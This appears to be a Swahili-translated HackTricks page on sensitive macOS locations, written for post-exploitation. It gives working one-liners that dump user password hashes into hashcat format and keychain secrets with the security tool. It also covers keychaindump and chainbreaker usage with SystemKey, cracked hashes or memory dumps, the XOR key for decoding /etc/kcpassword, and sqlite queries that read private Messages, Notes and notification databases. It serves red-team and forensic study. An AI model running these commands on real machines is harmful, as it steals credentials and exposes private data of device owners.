hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
2024-02-11 02:13:58 +00:00

11 KiB

Maeneo Muhimu ya macOS

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Maneno ya Siri

Maneno ya Siri ya Kivuli

Maneno ya siri ya kivuli huhifadhiwa pamoja na usanidi wa mtumiaji katika plists iliyoko kwenye /var/db/dslocal/nodes/Default/users/.
Oneliner ifuatayo inaweza kutumika kudumpisha habari zote kuhusu watumiaji (ikiwa ni pamoja na habari za hash):

{% code overflow="wrap" %}

for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done

{% endcode %}

Scripts kama hii au hii inaweza kutumika kubadilisha hash kuwa muundo wa hashcat.

Laini mbadala ambayo itatoa siri za akaunti zote zisizo za huduma katika muundo wa hashcat -m 7100 (macOS PBKDF2-SHA512):

{% code overflow="wrap" %}

sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'

{% endcode %}

Kupata Mwaga wa Keychain

Tambua kuwa unapotumia binary ya usalama kwa kupata mwaga wa nywila zilizofichuliwa, maombi kadhaa yatauliza mtumiaji kuruhusu operesheni hii.

#security
secuirty dump-trust-settings [-s] [-d] #List certificates
security list-keychains #List keychain dbs
security list-smartcards #List smartcards
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)

Keychaindump

{% hint style="danger" %} Kulingana na maoni haya juuso/keychaindump#10 (comment) inaonekana kama zana hizi hazifanyi kazi tena katika Big Sur. {% endhint %}

Muhtasari wa Keychaindump

Zana inayoitwa keychaindump imeendelezwa ili kutoa nywila kutoka kwa keychains ya macOS, lakini inakabiliwa na vizuizi katika toleo jipya la macOS kama Big Sur, kama ilivyoelezwa katika mjadala. Matumizi ya keychaindump yanahitaji mshambuliaji kupata ufikiaji na kuongeza mamlaka hadi root. Zana hii inatumia udhaifu kwamba keychain inafunguliwa kiotomatiki baada ya mtumiaji kuingia kwa urahisi, kuruhusu programu kupata keychain bila kuhitaji nywila ya mtumiaji mara kwa mara. Walakini, ikiwa mtumiaji anachagua kufunga keychain yao baada ya kila matumizi, keychaindump inakuwa haifanyi kazi.

Keychaindump inafanya kazi kwa kulenga mchakato maalum unaoitwa securityd, ulioelezewa na Apple kama daemoni ya idhini na shughuli za kryptografia, muhimu kwa kupata keychain. Mchakato wa uchimbaji unahusisha kutambua Master Key inayotokana na nywila ya kuingia ya mtumiaji. Ufunguo huu ni muhimu kwa kusoma faili ya keychain. Ili kupata Master Key, keychaindump inachunguza kumbukumbu ya securityd kwa kutumia amri ya vmmap, ikisaka ufunguo unaowezekana ndani ya maeneo yaliyotambuliwa kama MALLOC_TINY. Amri ifuatayo hutumiwa kuangalia maeneo haya ya kumbukumbu:

sudo vmmap <securityd PID> | grep MALLOC_TINY

Baada ya kutambua ufunguo wa msingi unaowezekana, keychaindump inatafuta kupitia rundo la data kwa mfano maalum (0x0000000000000018) ambao unaashiria mgombea wa ufunguo wa msingi. Hatua zaidi, ikiwa ni pamoja na kufuta uchafu, zinahitajika ili kutumia ufunguo huu, kama ilivyoelezwa katika msimbo wa chanzo wa keychaindump. Wachambuzi wanaojikita katika eneo hili wanapaswa kuzingatia kuwa data muhimu kwa kufuta ufunguo wa keychain imehifadhiwa ndani ya kumbukumbu ya mchakato wa securityd. Amri ya mfano ya kuendesha keychaindump ni:

sudo ./keychaindump

chainbreaker

Chainbreaker inaweza kutumika kuondoa aina zifuatazo za habari kutoka kwenye keychain ya OSX kwa njia salama ya kiforensiki:

  • Hashed Keychain password, inayofaa kwa kuvunja kwa kutumia hashcat au John the Ripper
  • Manenosiri ya Mtandao
  • Manenosiri ya Kawaida
  • Private Keys
  • Public Keys
  • Vyeti vya X509
  • Noti Salama
  • Manenosiri ya Appleshare

Kwa kutumia nenosiri la kufungua keychain, ufunguo mkuu uliopatikana kwa kutumia volafox au volatility, au faili ya kufungua kama SystemKey, Chainbreaker pia itatoa manenosiri ya maandishi wazi.

Bila moja ya njia hizi za kufungua Keychain, Chainbreaker itaonyesha habari zote zilizopo.

Dump keychain keys

#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain

Dump keychain keys (with passwords) with SystemKey

Dumpisha funguo za keychain (pamoja na nywila) kwa kutumia SystemKey

# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dump keychain keys (with passwords) cracking the hash

Dumpisha funguo za keychain (pamoja na nywila) kwa kuvunja hash

# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
# Crack it with hashcat
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dump keychain keys (with passwords) with memory dump

Fuata hatua hizi kutekeleza dump ya kumbukumbu

#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump

#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dump keychain keys (with passwords) using users password

Ikiwa unajua nenosiri la mtumiaji, unaweza kulitumia kudondosha na kufichua keychains ambazo ni za mtumiaji.

#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db

kcpassword

Faili la kcpassword ni faili ambalo linashikilia nywila ya kuingia ya mtumiaji, lakini tu ikiwa mmiliki wa mfumo amewezesha kuingia moja kwa moja. Kwa hivyo, mtumiaji ataingia moja kwa moja bila kuombwa nywila (ambayo sio salama sana).

Nywila imehifadhiwa katika faili /etc/kcpassword iliyofanyiwa operesheni ya XOR na ufunguo 0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F. Ikiwa nywila ya mtumiaji ni ndefu kuliko ufunguo, ufunguo utatumika tena.
Hii inafanya nywila kuwa rahisi kupata, kwa mfano kwa kutumia hati kama hii.

Taarifa ya Kuvutia katika Databases

Ujumbe

sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'

Taarifa za Arifa

Unaweza kupata data za Arifa katika $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/

Maelezo mengi ya kuvutia yatakuwa katika blob. Hivyo utahitaji kuchimbua yaliyomo hayo na kubadilisha kuwa soma kwa binadamu au tumia strings. Ili kufikia hilo unaweza kufanya:

{% code overflow="wrap" %}

cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack

Maelezo

Maelezo ya watumiaji yanaweza kupatikana katika ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite

{% code overflow="wrap" %}

sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables

#To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done

{% endcode %}

Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: